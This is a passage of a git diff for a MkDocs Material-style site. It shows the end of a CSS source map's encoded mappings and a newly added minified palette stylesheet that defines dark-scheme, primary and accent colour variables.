AAA,CARA,WzBmwFN,CyBtvFE,kBAUE,2CAAA,CACA,mBAAA,CACA,8BAAA,CAJA,gCAAA,CACA,oBAAA,CAHA,kBAAA,CAFA,YAAA,CASA,SAAA,CANA,aAAA,CAFA,SAAA,CAJA,iBAAA,CAgBA,4BAAA,CAfA,UAAA,CAYA,+CACE,CAZF,SzBowFJ,CyBnvFI,+EACE,gBAAA,CACA,SAAA,CACA,sCzBqvFN,CyB/uFI,wBAGE,oCACE,gCzB+uFN,CyB3uFI,2CACE,czB6uFN,CACF,CyBxuFE,kBACE,kBzB0uFJ,CyBtuFE,4BAGE,kBAAA,CAAA,oBzB6uFJ,CyBhvFE,4BAGE,mBAAA,CAAA,mBzB6uFJ,CyBhvFE,kBAKE,cAAA,CAJA,aAAA,CAKA,YAAA,CAIA,uBAAA,CAH
A,2CACE,CAJF,kBAAA,CAFA,UzB8uFJ,CyBnuFI,gDACE,+BzBquFN,CyBjuFI,wBACE,qDzBmuFN,C0Bp0FA,MAEI,uWAAA,CAAA,8WAAA,CAAA,sPAAA,CAAA,8xBAAA,CAAA,0MAAA,CAAA,gbAAA,CAAA,gMAAA,CAAA,iQAAA,CAAA,0VAAA,CAAA,6aAAA,CAAA,8SAAA,CAAA,gM1B61FJ,C0Bj1FE,4CAME,8CAAA,CACA,2BAAA,CACA,mBAAA,CACA,8BAAA,CAJA,mCAAA,CAJA,iBAAA,CAGA,gBAAA,CADA,iBAAA,CADA,eAAA,CAQA,uB1Bo1FJ,C0Bj1FI,aAbF,4CAcI,e1Bo1FJ,CACF,C0Bh1FI,gDACE,qB1Bk1FN,C0B90FI,gIAEE,iBAAA,CADA,c1Bi1FN,C0B50FI,4FACE,iB1B80FN,C0B10FI,kFACE,e1B40FN,C0Bx0FI,0FACE,Y1B00FN,C0Bt0FI,8EACE,mB1Bw0FN,C0Bn0FE,sEAGE,iBAAA,CAAA,mB1B60FJ,C0Bh1FE,sEAGE,kBAAA,CAAA,kB1B60FJ,C0Bh1FE,sEASE,uB1Bu0FJ,C0Bh1FE,sEASE,wB1Bu0FJ,C0Bh1FE,sEAUE,4B1Bs0FJ,C0Bh1FE,4IAWE,6B1Bq0FJ,C0Bh1FE,sEAWE,4B1Bq0FJ,C0Bh1FE,kDAOE,0BAAA,CACA,WAAA,CAFA,eAAA,CADA,eAAA,CAHA,oBAAA,CAAA,iBAAA,CADA,iB1B+0FJ,C0Bl0FI,kFACE,e1Bo0FN,C0Bh0FI,oFAOE,U1Bs0FN,C0B70FI,oFAOE,W1Bs0FN,C0B70FI,gEAME,wBCwIU,CDzIV,UAAA,CADA,WAAA,CAIA,kDAAA,CAAA,0CAAA,CACA,4BAAA,CAAA,oBAAA,CACA,6BAAA,CAAA,qBAAA,CACA,yBAAA,CAAA,iBAAA,CAVA,iBAAA,CACA,UAAA,CACA,U1B00FN,C0B9zFI,4DACE,4D1Bg0FN,C0BlzFE,sDACE,oB1BqzFJ,C0BjzFE,8DACE,0B1BozFJ,C0BjzFI,4EACE,wBAbG,CAcH,kDAAA,CAAA,0C1BmzFN,C0B/yFI,0EACE,a1BizFN,C0Bj0FE,8DACE,oB1Bo0FJ,C0Bh0FE,sEACE,0B1Bm0FJ,C0Bh0FI,oFACE,wBAbG,CAcH,sDAAA,CAAA,8C1Bk0FN,C0B9zFI,kFACE,a1Bg0FN,C0Bh1FE,sDACE,oB1Bm1FJ,C0B/0FE,8DACE,0B1Bk1FJ,C0B/0FI,4EACE,wBAbG,CAcH,kDAAA,CAAA,0C1Bi1FN,C0B70FI,0EACE,a1B+0FN,C0B/1FE,oDACE,oB1Bk2FJ,C0B91FE,4DACE,0B1Bi2FJ,C0B91FI,0EACE,wBAbG,CAcH,iDAAA,CAAA,yC1Bg2FN,C0B51FI,wEACE,a1B81FN,C0B92FE,4DACE,oB1Bi3FJ,C0B72FE,oEACE,0B1Bg3FJ,C0B72FI,kFACE,wBAbG,CAcH,qDAAA,CAAA,6C1B+2FN,C0B32FI,gFACE,a1B62FN,C0B73FE,8DACE,oB1Bg4FJ,C0B53FE,sEACE,0B1B+3FJ,C0B53FI,oFACE,wBAbG,CAcH,sDAAA,CAAA,8C1B83FN,C0B13FI,kFACE,a1B43FN,C0B54FE,4DACE,oB1B+4FJ,C0B34FE,oEACE,0B1B84FJ,C0B34FI,kFACE,wBAbG,CAcH,qDAAA,CAAA,6C1B64FN,C0Bz4FI,gFACE,a1B24FN,C0B35FE,4DACE,oB1B85FJ,C0B15FE,oEACE,0B1B65FJ,C0B15FI,kFACE,wBAbG,CAcH,qDAAA,CAAA,6C1B45FN,C0Bx5FI,gFACE,a1B05FN,C0B16FE,0DACE,oB1B66FJ,C0Bz6FE,kEACE,0B1B46FJ,C0Bz6FI
,gFACE,wBAbG,CAcH,oDAAA,CAAA,4C1B26FN,C0Bv6FI,8EACE,a1By6FN,C0Bz7FE,oDACE,oB1B47FJ,C0Bx7FE,4DACE,0B1B27FJ,C0Bx7FI,0EACE,wBAbG,CAcH,iDAAA,CAAA,yC1B07FN,C0Bt7FI,wEACE,a1Bw7FN,C0Bx8FE,4DACE,oB1B28FJ,C0Bv8FE,oEACE,0B1B08FJ,C0Bv8FI,kFACE,wBAbG,CAcH,qDAAA,CAAA,6C1By8FN,C0Br8FI,gFACE,a1Bu8FN,C0Bv9FE,wDACE,oB1B09FJ,C0Bt9FE,gEACE,0B1By9FJ,C0Bt9FI,8EACE,wBAbG,CAcH,mDAAA,CAAA,2C1Bw9FN,C0Bp9FI,4EACE,a1Bs9FN,C4B/mGA,MACE,wM5BknGF,C4BzmGE,sBAEE,uCAAA,CADA,gB5B6mGJ,C4BzmGI,mCACE,a5B2mGN,C4B5mGI,mCACE,c5B2mGN,C4BvmGM,4BACE,sB5BymGR,C4BtmGQ,mCACE,gC5BwmGV,C4BpmGQ,2DACE,SAAA,CAEA,uBAAA,CADA,e5BumGV,C4BlmGQ,yGACE,SAAA,CACA,uB5BomGV,C4BhmGQ,yCACE,Y5BkmGV,C4B3lGE,0BACE,eAAA,CACA,e5B6lGJ,C4B1lGI,+BACE,oB5B4lGN,C4BvlGE,gDACE,Y5BylGJ,C4BrlGE,8BAIE,+BAAA,CAHA,oBAAA,CAEA,WAAA,CAGA,SAAA,CAKA,4BAAA,CAJA,4DACE,CAHF,0B5BylGJ,C4BhlGI,aAdF,8BAeI,+BAAA,CACA,SAAA,CACA,uB5BmlGJ,CACF,C4BhlGI,wCACE,6B5BklGN,C4B9kGI,oCACE,+B5BglGN,C4B5kGI,qCAKE,6BAAA,CADA,UAAA,CAHA,oBAAA,CAEA,YAAA,CAGA,2CAAA,CAAA,mCAAA,CACA,4BAAA,CAAA,oBAAA,CACA,6BAAA,CAAA,qBAAA,CACA,yBAAA,CAAA,iBAAA,CAPA,W5BqlGN,C4BxkGQ,mDACE,oB5B0kGV,C6BxrGE,kCAEE,iB7B8rGJ,C6BhsGE,kCAEE,kB7B8rGJ,C6BhsGE,wBAGE,yCAAA,CAFA,oBAAA,CAGA,SAAA,CACA,mC7B2rGJ,C6BtrGI,aAVF,wBAWI,Y7ByrGJ,CACF,C6BrrGE,6FAEE,SAAA,CACA,mC7BurGJ,C6BjrGE,4FAEE,+B7BmrGJ,C6B/qGE,oBACE,yBAAA,CACA,uBAAA,CAGA,yE7B+qGJ,CKhjGI,sCwBrHE,qDACE,uB7BwqGN,CACF,C6BnqGE,kEACE,yB7BqqGJ,C6BjqGE,sBACE,0B7BmqGJ,C8B9tGE,2BACE,a9BiuGJ,CK5iGI,wCyBtLF,2BAKI,e9BiuGJ,CACF,C8B9tGI,6BAGE,0BAAA,CAAA,2BAAA,CADA,eAAA,CAEA,iBAAA,CAHA,yBAAA,CAAA,iB9BmuGN,C8B7tGM,2CACE,kB9B+tGR,C+BhvGE,uBACE,4C/BovGJ,C+B/uGE,8CAJE,kCAAA,CAAA,0B/BuvGJ,C+BnvGE,uBACE,4C/BkvGJ,C+B7uGE,4BAEE,kCAAA,CAAA,0BAAA,CADA,qC/BgvGJ,C+B5uGI,mCACE,a/B8uGN,C+B1uGI,kCACE,a/B4uGN,C+BvuGE,0BAKE,eAAA,CAJA,aAAA,CAEA,YAAA,CACA,aAAA,CAFA,kBAAA,CAAA,mB/B4uGJ,C+BtuGI,uCACE,e/BwuGN,C+BpuGI,sCACE,kB/BsuGN,CgCnxGA,MACE,8LhCsxGF,CgC7wGE,oBAGE,iBAAA,CAEA,gBAAA,CADA,ahC+wGJ,CgC3wGI,wCACE,uBhC6wGN,CgCzwGI,gCAEE,eAAA,CADA,gBhC4wGN,CgCrwGM,wCACE,mBhCuwGR,CgCjwGE,8BAKE,
oBhCowGJ,CgCzwGE,8BAKE,mBhCowGJ,CgCzwGE,8BAOE,4BhCkwGJ,CgCzwGE,4DAQE,6BhCiwGJ,CgCzwGE,8BAQE,4BhCiwGJ,CgCzwGE,oBAME,cAAA,CAHA,aAAA,CACA,ehCqwGJ,CgC9vGI,kCACE,uCAAA,CACA,oBhCgwGN,CgC5vGI,wCAEE,uCAAA,CADA,YhC+vGN,CgC1vGI,oCASE,WhCgwGN,CgCzwGI,oCASE,UhCgwGN,CgCzwGI,0BAME,6BAAA,CADA,UAAA,CADA,WAAA,CAMA,yCAAA,CAAA,iCAAA,CACA,4BAAA,CAAA,oBAAA,CACA,6BAAA,CAAA,qBAAA,CACA,yBAAA,CAAA,iBAAA,CAZA,iBAAA,CACA,UAAA,CAMA,sBAAA,CADA,yBAAA,CAJA,UhCswGN,CgCzvGM,oCACE,wBhC2vGR,CgCtvGI,4BACE,YhCwvGN,CgCnvGI,4CACE,YhCqvGN,CiC50GE,+DACE,mBAAA,CACA,cAAA,CACA,uBjC+0GJ,CiC50GI,2EAGE,iBAAA,CADA,eAAA,CADA,ajCg1GN,CkCt1GE,6BACE,sClCy1GJ,CkCt1GE,cACE,yClCw1GJ,CkC50GE,sIACE,oClC80GJ,CkCt0GE,2EACE,qClCw0GJ,CkC9zGE,wGACE,oClCg0GJ,CkCvzGE,yFACE,qClCyzGJ,CkCpzGE,6BACE,kClCszGJ,CkChzGE,6CACE,sClCkzGJ,CkC3yGE,4DACE,sClC6yGJ,CkCtyGE,4DACE,qClCwyGJ,CkC/xGE,yFACE,qClCiyGJ,CkCzxGE,2EACE,sClC2xGJ,CkChxGE,wHACE,qClCkxGJ,CkC7wGE,8BAGE,mBAAA,CADA,gBAAA,CADA,gBlCixGJ,CkC5wGE,eACE,4ClC8wGJ,CkC3wGE,eACE,4ClC6wGJ,CkCzwGE,gBAIE,wCAAA,CAHA,aAAA,CAEA,wBAAA,CADA,wBlC6wGJ,CkCvwGE,yBAOE,wCAAA,CACA,+DAAA,CACA,4BAAA,CACA,6BAAA,CARA,iBAAA,CAGA,eAAA,CACA,eAAA,CAFA,cAAA,CADA,oCAAA,CAFA,iBlCkxGJ,CkCtwGI,6BACE,YlCwwGN,CkCrwGM,kCACE,wBAAA,CACA,yBlCuwGR,CkCjwGE,iCAaE,wCAAA,CACA,+DAAA,CAJA,uCAAA,CACA,0BAAA,CALA,UAAA,CAJA,oBAAA,CAOA,2BAAA,CADA,2BAAA,CADA,2BAAA,CANA,eAAA,CAWA,wBAAA,CAAA,qBAAA,CAAA,gBAAA,CAPA,SlC0wGJ,CkCxvGE,sBACE,iBAAA,CACA,iBlC0vGJ,CkClvGI,sCACE,gBlCovGN,CkChvGI,gDACE,YlCkvGN,CkCxuGA,gBACE,iBlC2uGF,CkCvuGE,yCACE,aAAA,CACA,SlCyuGJ,CkCpuGE,mBACE,YlCsuGJ,CkCjuGE,oBACE,QlCmuGJ,CkC/tGE,4BACE,WAAA,CACA,SAAA,CACA,elCiuGJ,CkC9tGI,0CACE,YlCguGN,CkC1tGE,yBAKE,wCAAA,CAEA,+BAAA,CADA,4BAAA,CAHA,eAAA,CADA,oDAAA,CAEA,wBAAA,CAAA,qBAAA,CAAA,gBlC+tGJ,CkCxtGE,2BAEE,+DAAA,CADA,2BlC2tGJ,CkCvtGI,+BACE,uCAAA,CACA,gBlCytGN,CkCptGE,sBACE,MAAA,CACA,WlCstGJ,CkCjtGA,aACE,alCotGF,CkC1sGE,4BAEE,aAAA,CADA,YlC8sGJ,CkC1sGI,wDAEE,2BAAA,CADA,wBlC6sGN,CkCvsGE,+BAKE,2CAAA,CAEA,+BAAA,CADA,gCAAA,CADA,sBAAA,CAHA,mBAAA,CACA,gBAAA,CAFA,alC+sGJ,CkCtsGI,qCAE
E,UAAA,CACA,UAAA,CAFA,alC0sGN,CK30GI,wC6BgJF,8BACE,iBlC+rGF,CkCrrGE,wSAGE,elC2rGJ,CkCvrGE,sCAEE,mBAAA,CACA,eAAA,CADA,oBAAA,CADA,kBAAA,CAAA,mBlC2rGJ,CACF,CDlhHI,yDAIE,+BAAA,CACA,8BAAA,CAFA,aAAA,CADA,QAAA,CADA,iBCwhHN,CDhhHI,uBAEE,uCAAA,CADA,cCmhHN,CD99GM,iHAEE,WAlDkB,CAiDlB,kBCy+GR,CD1+GM,6HAEE,WAlDkB,CAiDlB,kBCq/GR,CDt/GM,6HAEE,WAlDkB,CAiDlB,kBCigHR,CDlgHM,oHAEE,WAlDkB,CAiDlB,kBC6gHR,CD9gHM,0HAEE,WAlDkB,CAiDlB,kBCyhHR,CD1hHM,uHAEE,WAlDkB,CAiDlB,kBCqiHR,CDtiHM,uHAEE,WAlDkB,CAiDlB,kBCijHR,CDljHM,6HAEE,WAlDkB,CAiDlB,kBC6jHR,CD9jHM,yCAEE,WAlDkB,CAiDlB,kBCikHR,CDlkHM,yCAEE,WAlDkB,CAiDlB,kBCqkHR,CDtkHM,0CAEE,WAlDkB,CAiDlB,kBCykHR,CD1kHM,uCAEE,WAlDkB,CAiDlB,kBC6kHR,CD9kHM,wCAEE,WAlDkB,CAiDlB,kBCilHR,CDllHM,sCAEE,WAlDkB,CAiDlB,kBCqlHR,CDtlHM,wCAEE,WAlDkB,CAiDlB,kBCylHR,CD1lHM,oCAEE,WAlDkB,CAiDlB,kBC6lHR,CD9lHM,2CAEE,WAlDkB,CAiDlB,kBCimHR,CDlmHM,qCAEE,WAlDkB,CAiDlB,kBCqmHR,CDtmHM,oCAEE,WAlDkB,CAiDlB,kBCymHR,CD1mHM,kCAEE,WAlDkB,CAiDlB,kBC6mHR,CD9mHM,qCAEE,WAlDkB,CAiDlB,kBCinHR,CDlnHM,mCAEE,WAlDkB,CAiDlB,kBCqnHR,CDtnHM,qCAEE,WAlDkB,CAiDlB,kBCynHR,CD1nHM,wCAEE,WAlDkB,CAiDlB,kBC6nHR,CD9nHM,sCAEE,WAlDkB,CAiDlB,kBCioHR,CDloHM,2CAEE,WAlDkB,CAiDlB,kBCqoHR,CD1nHM,iCAEE,WAPkB,CAMlB,iBC6nHR,CD9nHM,uCAEE,WAPkB,CAMlB,iBCioHR,CDloHM,mCAEE,WAPkB,CAMlB,iBCqoHR,CmCvtHA,MACE,qMAAA,CACA,mMnC0tHF,CmCjtHE,wBAKE,mBAAA,CAHA,YAAA,CACA,qBAAA,CACA,YAAA,CAHA,iBnCwtHJ,CmC9sHI,8BAGE,QAAA,CACA,SAAA,CAHA,iBAAA,CACA,OnCktHN,CmC7sHM,qCACE,0BnC+sHR,CmChrHE,2BAKE,uBAAA,CADA,+DAAA,CAHA,YAAA,CACA,cAAA,CACA,aAAA,CAGA,oBnCkrHJ,CmC/qHI,aATF,2BAUI,gBnCkrHJ,CACF,CmC/qHI,cAGE,+BACE,iBnC+qHN,CmC5qHM,sCAQE,oCAAA,CANA,QAAA,CAKA,UAAA,CAHA,aAAA,CAEA,UAAA,CAHA,MAAA,CAFA,iBAAA,CAYA,2CAAA,CAJA,qCACE,CAEF,kDAAA,CAPA,+BnCorHR,CACF,CmCvqHI,8CACE,YnCyqHN,CmCrqHI,iCASE,+BAAA,CACA,6BAAA,CAJA,uCAAA,CAEA,cAAA,CAPA,aAAA,CAGA,gBAAA,CACA,eAAA,CAFA,8BAAA,CAWA,+BAAA,CAHA,2CACE,CALF,kBAAA,CALA,UnCirHN,CmClqHM,aAII,6CACE,OnCiqHV,CmClqHQ,8CACE,OnCoqHV,CmCrqHQ,8CACE,OnCuqHV,CmCxqHQ,8CACE,OnC0qHV,CmC3qHQ,8CACE,OnC6qHV,CmC9qHQ,8CACE,OnCgrHV,Cm
CjrHQ,8CACE,OnCmrHV,CmCprHQ,8CACE,OnCsrHV,CmCvrHQ,8CACE,OnCyrHV,CmC1rHQ,+CACE,QnC4rHV,CmC7rHQ,+CACE,QnC+rHV,CmChsHQ,+CACE,QnCksHV,CmCnsHQ,+CACE,QnCqsHV,CmCtsHQ,+CACE,QnCwsHV,CmCzsHQ,+CACE,QnC2sHV,CmC5sHQ,+CACE,QnC8sHV,CmC/sHQ,+CACE,QnCitHV,CmCltHQ,+CACE,QnCotHV,CmCrtHQ,+CACE,QnCutHV,CmCxtHQ,+CACE,QnC0tHV,CACF,CmCrtHM,uCACE,+BnCutHR,CmCjtHE,4BACE,UnCmtHJ,CmChtHI,aAJF,4BAKI,gBnCmtHJ,CACF,CmC/sHE,0BACE,YnCitHJ,CmC9sHI,aAJF,0BAKI,anCitHJ,CmC7sHM,sCACE,OnC+sHR,CmChtHM,uCACE,OnCktHR,CmCntHM,uCACE,OnCqtHR,CmCttHM,uCACE,OnCwtHR,CmCztHM,uCACE,OnC2tHR,CmC5tHM,uCACE,OnC8tHR,CmC/tHM,uCACE,OnCiuHR,CmCluHM,uCACE,OnCouHR,CmCruHM,uCACE,OnCuuHR,CmCxuHM,wCACE,QnC0uHR,CmC3uHM,wCACE,QnC6uHR,CmC9uHM,wCACE,QnCgvHR,CmCjvHM,wCACE,QnCmvHR,CmCpvHM,wCACE,QnCsvHR,CmCvvHM,wCACE,QnCyvHR,CmC1vHM,wCACE,QnC4vHR,CmC7vHM,wCACE,QnC+vHR,CmChwHM,wCACE,QnCkwHR,CmCnwHM,wCACE,QnCqwHR,CmCtwHM,wCACE,QnCwwHR,CACF,CmClwHI,+FAEE,QnCowHN,CmCjwHM,yGACE,wBAAA,CACA,yBnCowHR,CmC3vHM,2DAEE,wBAAA,CACA,yBAAA,CAFA,QnC+vHR,CmCxvHM,iEACE,QnC0vHR,CmCvvHQ,qLAGE,wBAAA,CACA,yBAAA,CAFA,QnC2vHV,CmCrvHQ,6FACE,wBAAA,CACA,yBnCuvHV,CmClvHM,yDACE,kBnCovHR,CmC/uHI,sCACE,QnCivHN,CmC5uHE,2BAEE,iBAAA,CAOA,kBAAA,CAHA,uCAAA,CAEA,cAAA,CAPA,aAAA,CAGA,YAAA,CACA,gBAAA,CAEA,mBAAA,CAGA,gCAAA,CAPA,WnCqvHJ,CmC3uHI,iCAEE,uDAAA,CADA,+BnC8uHN,CmCzuHI,iCAKE,6BAAA,CADA,UAAA,CAHA,aAAA,CAEA,WAAA,CAMA,8CAAA,CAAA,sCAAA,CACA,4BAAA,CAAA,oBAAA,CACA,6BAAA,CAAA,qBAAA,CACA,yBAAA,CAAA,iBAAA,CANA,+CACE,CALF,UnCmvHN,CmCpuHE,4BAOE,yEACE,CANF,YAAA,CAGA,aAAA,CAFA,qBAAA,CAGA,mBAAA,CALA,iBAAA,CAYA,wBAAA,CATA,YnC0uHJ,CmC9tHI,sCACE,wBnCguHN,CmC5tHI,oCACE,SnC8tHN,CmC1tHI,kCAGE,wEACE,CAFF,mBAAA,CADA,OnC8tHN,CmCptHM,uDACE,8CAAA,CAAA,sCnCstHR,CKt0HI,wC8B8HF,wDAEE,kBnC8sHF,CmChtHA,wDAEE,mBnC8sHF,CmChtHA,8CAGE,eAAA,CAFA,eAAA,CAGA,iCnC4sHF,CmCxsHE,8DACE,mBnC2sHJ,CmC5sHE,8DACE,kBnC2sHJ,CmC5sHE,oDAEE,UnC0sHJ,CmCtsHE,8EAEE,kBnCysHJ,CmC3sHE,8EAEE,mBnCysHJ,CmC3sHE,8EAGE,kBnCwsHJ,CmC3sHE,8EAGE,mBnCwsHJ,CmC3sHE,oEACE,UnC0sHJ,CmCpsHE,8EAEE,mBnCusHJ,CmCzsHE,8EAEE,kBnCusHJ,CmCzsHE,8EAGE,
mBnCssHJ,CmCzsHE,8EAGE,kBnCssHJ,CmCzsHE,oEACE,UnCwsHJ,CACF,CmC1rHE,cAHF,olDAII,+BnC6rHF,CmC1rHE,g8GACE,sCnC4rHJ,CACF,CmCvrHA,4sDACE,uDnC0rHF,CmCtrHA,wmDACE,anCyrHF,CoCtiIA,MACE,8WAAA,CAEA,uXpC0iIF,CoChiIE,4BAEE,oBAAA,CADA,iBpCoiIJ,CoC/hII,sDAGE,SpCiiIN,CoCpiII,sDAGE,UpCiiIN,CoCpiII,4CACE,iBAAA,CACA,SpCkiIN,CoC5hIE,+CAEE,SAAA,CADA,UpC+hIJ,CoC1hIE,kDAOE,WpCgiIJ,CoCviIE,kDAOE,YpCgiIJ,CoCviIE,wCAME,qDAAA,CADA,UAAA,CADA,aAAA,CAIA,0CAAA,CAAA,kCAAA,CACA,4BAAA,CAAA,oBAAA,CACA,6BAAA,CAAA,qBAAA,CACA,yBAAA,CAAA,iBAAA,CAVA,iBAAA,CACA,SAAA,CACA,YpCoiIJ,CoCxhIE,gEACE,wBTyWa,CSxWb,mDAAA,CAAA,2CpC0hIJ,CqC5kIA,QACE,8DAAA,CAGA,+CAAA,CACA,iEAAA,CACA,oDAAA,CACA,sDAAA,CACA,mDrC6kIF,CqCvkIA,SAEE,kBAAA,CADA,YrC2kIF,CKp7HI,mCiChKA,8BACE,UtC4lIJ,CsC7lIE,8BACE,WtC4lIJ,CsC7lIE,8BAGE,kBtC0lIJ,CsC7lIE,8BAGE,iBtC0lIJ,CsC7lIE,oBAKE,mBAAA,CADA,YAAA,CAFA,atC2lIJ,CsCrlII,kCACE,WtCwlIN,CsCzlII,kCACE,UtCwlIN,CsCzlII,kCAEE,iBAAA,CAAA,ctCulIN,CsCzlII,kCAEE,aAAA,CAAA,kBtCulIN,CACF","file":"main.css"}
\ No newline at end of file
diff --git a/assets/stylesheets/palette.ecc896b0.min.css b/assets/stylesheets/palette.ecc896b0.min.css
new file mode 100644
index 000000000..35420eb6f
--- /dev/null
+++ b/assets/stylesheets/palette.ecc896b0.min.css
@@ -0,0 +1 @@
+@media screen{[data-md-color-scheme=slate]{--md-hue:232;--md-default-fg-color:hsla(var(--md-hue),75%,95%,1);--md-default-fg-color--light:hsla(var(--md-hue),75%,90%,0.62);--md-default-fg-color--lighter:hsla(var(--md-hue),75%,90%,0.32);--md-default-fg-color--lightest:hsla(var(--md-hue),75%,90%,0.12);--md-default-bg-color:hsla(var(--md-hue),15%,21%,1);--md-default-bg-color--light:hsla(var(--md-hue),15%,21%,0.54);--md-default-bg-color--lighter:hsla(var(--md-hue),15%,21%,0.26);--md-default-bg-color--lightest:hsla(var(--md-hue),15%,21%,0.07);--md-code-fg-color:hsla(var(--md-hue),18%,86%,1);--md-code-bg-color:hsla(var(--md-hue),15%,15%,1);--md-code-hl-color:#4287ff26;--md-code-hl-number-color:#e6695b;--md-code-hl-special-color:#f06090;--md-code-hl-function-color:#c973d9;--md-code-hl-constant-color:#9383e2;--md-code-hl-keyword-color:#6791e0;--md-code-hl-string-color:#2fb170;--md-code-hl-name-color:var(--md-code-fg-color);--md-code-hl-operator-color:var(--md-default-fg-color--light);--md-code-hl-punctuation-color:var(--md-default-fg-color--light);--md-code-hl-comment-color:var(--md-default-fg-color--light);--md-code-hl-generic-color:var(--md-default-fg-color--light);--md-code-hl-variable-color:var(--md-default-fg-color--light);--md-typeset-color:var(--md-default-fg-color);--md-typeset-a-color:var(--md-primary-fg-color);--md-typeset-mark-color:#4287ff4d;--md-typeset-kbd-color:hsla(var(--md-hue),15%,94%,0.12);--md-typeset-kbd-accent-color:hsla(var(--md-hue),15%,94%,0.2);--md-typeset-kbd-border-color:hsla(var(--md-hue),15%,14%,1);--md-typeset-table-color:hsla(var(--md-hue),75%,95%,0.12);--md-typeset-table-color--light:hsla(var(--md-hue),75%,95%,0.035);--md-admonition-fg-color:var(--md-default-fg-color);--md-admonition-bg-color:var(--md-default-bg-color);--md-footer-bg-color:hsla(var(--md-hue),15%,12%,0.87);--md-footer-bg-color--dark:hsla(var(--md-hue),15%,10%,1);--md-shadow-z1:0 0.2rem 0.5rem #0003,0 0 0.05rem #0000001a;--md-shadow-z2:0 0.2rem 0.5rem #0000004d,0 0 0.05rem 
#00000040;--md-shadow-z3:0 0.2rem 0.5rem #0006,0 0 0.05rem #00000059;color-scheme:dark}[data-md-color-scheme=slate] img[src$="#gh-light-mode-only"],[data-md-color-scheme=slate] img[src$="#only-light"]{display:none}[data-md-color-scheme=slate][data-md-color-primary=pink]{--md-typeset-a-color:#ed5487}[data-md-color-scheme=slate][data-md-color-primary=purple]{--md-typeset-a-color:#bd78c9}[data-md-color-scheme=slate][data-md-color-primary=deep-purple]{--md-typeset-a-color:#a682e3}[data-md-color-scheme=slate][data-md-color-primary=indigo]{--md-typeset-a-color:#6c91d5}[data-md-color-scheme=slate][data-md-color-primary=teal]{--md-typeset-a-color:#00ccb8}[data-md-color-scheme=slate][data-md-color-primary=green]{--md-typeset-a-color:#71c174}[data-md-color-scheme=slate][data-md-color-primary=deep-orange]{--md-typeset-a-color:#ff9575}[data-md-color-scheme=slate][data-md-color-primary=brown]{--md-typeset-a-color:#c7846b}[data-md-color-scheme=slate][data-md-color-primary=black],[data-md-color-scheme=slate][data-md-color-primary=blue-grey],[data-md-color-scheme=slate][data-md-color-primary=grey],[data-md-color-scheme=slate][data-md-color-primary=white]{--md-typeset-a-color:#6c91d5}[data-md-color-switching] *,[data-md-color-switching] :after,[data-md-color-switching] 
:before{transition-duration:0ms!important}}[data-md-color-accent=red]{--md-accent-fg-color:#ff1947;--md-accent-fg-color--transparent:#ff19471a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=pink]{--md-accent-fg-color:#f50056;--md-accent-fg-color--transparent:#f500561a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=purple]{--md-accent-fg-color:#df41fb;--md-accent-fg-color--transparent:#df41fb1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=deep-purple]{--md-accent-fg-color:#7c4dff;--md-accent-fg-color--transparent:#7c4dff1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=indigo]{--md-accent-fg-color:#526cfe;--md-accent-fg-color--transparent:#526cfe1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=blue]{--md-accent-fg-color:#4287ff;--md-accent-fg-color--transparent:#4287ff1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=light-blue]{--md-accent-fg-color:#0091eb;--md-accent-fg-color--transparent:#0091eb1a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=cyan]{--md-accent-fg-color:#00bad6;--md-accent-fg-color--transparent:#00bad61a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=teal]{--md-accent-fg-color:#00bda4;--md-accent-fg-color--transparent:#00bda41a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=green]{--md-accent-fg-color:#00c753;--md-accent-fg-color--transparent:#00c7531a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=light-green]{--md-accent-fg-color:#63de17;--md-accent-fg-color--transparent:#63de171a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-accent=lime]{--md-accent-fg-color:#b0eb00;--md-accent-fg-color--transparent:#b0eb001a;--md-accent-bg-co
lor:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=yellow]{--md-accent-fg-color:#ffd500;--md-accent-fg-color--transparent:#ffd5001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=amber]{--md-accent-fg-color:#fa0;--md-accent-fg-color--transparent:#ffaa001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=orange]{--md-accent-fg-color:#ff9100;--md-accent-fg-color--transparent:#ff91001a;--md-accent-bg-color:#000000de;--md-accent-bg-color--light:#0000008a}[data-md-color-accent=deep-orange]{--md-accent-fg-color:#ff6e42;--md-accent-fg-color--transparent:#ff6e421a;--md-accent-bg-color:#fff;--md-accent-bg-color--light:#ffffffb3}[data-md-color-primary=red]{--md-primary-fg-color:#ef5552;--md-primary-fg-color--light:#e57171;--md-primary-fg-color--dark:#e53734;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=pink]{--md-primary-fg-color:#e92063;--md-primary-fg-color--light:#ec417a;--md-primary-fg-color--dark:#c3185d;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=purple]{--md-primary-fg-color:#ab47bd;--md-primary-fg-color--light:#bb69c9;--md-primary-fg-color--dark:#8c24a8;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=deep-purple]{--md-primary-fg-color:#7e56c2;--md-primary-fg-color--light:#9574cd;--md-primary-fg-color--dark:#673ab6;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=indigo]{--md-primary-fg-color:#4051b5;--md-primary-fg-color--light:#5d6cc0;--md-primary-fg-color--dark:#303fa1;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=blue]{--md-primary-fg-color:#2094f3;--md-primary-fg-color--light:#42a5f5;--md-primary-fg-color--dark:#